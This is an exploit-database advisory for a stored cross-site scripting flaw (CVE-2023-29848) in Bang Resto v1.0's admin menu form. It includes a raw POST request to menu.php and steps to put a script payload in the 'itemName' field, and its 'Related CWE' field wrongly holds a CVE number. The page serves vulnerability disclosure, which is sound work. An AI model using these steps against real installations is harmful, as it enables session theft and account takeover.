Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)

vendor:

Bang Resto

by:

Rahad Chowdhury

4.8

CVSS

MEDIUM

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Bang Resto

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2023-29848

CPE: a:hockeycomputindo:bang_resto:1.0

Metasploit:

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=134174

Platforms Tested: Windows 10, PHP 7.4.29, Apache 2.4.53

2023

Bang Resto v1.0 – Stored Cross-Site Scripting (XSS)

Bang Resto v1.0 is vulnerable to Stored Cross-Site Scripting (XSS). An attacker can inject malicious JavaScript code into the 'itemName' parameter of the 'menu.php' page. When a victim visits the page, the malicious code will be executed in the victim's browser. This can be used to steal session cookies, hijack user accounts, and perform other malicious activities.

Mitigation:

Input validation should be used to prevent XSS attacks. All user-supplied input should be validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29848

*Steps to Reproduce:*
1. First login to your admin panel.
2. then go to Menu section and click add new menu from group.
your request data will be:

POST /bangresto/admin/menu.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/admin/menu.php
Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6
Connection: close

itemName=test&itemPrice=1&menuID=1&addItem=

3. Then use any XSS Payload in "itemName" parameter and click add.
4. You will see XSS pop up.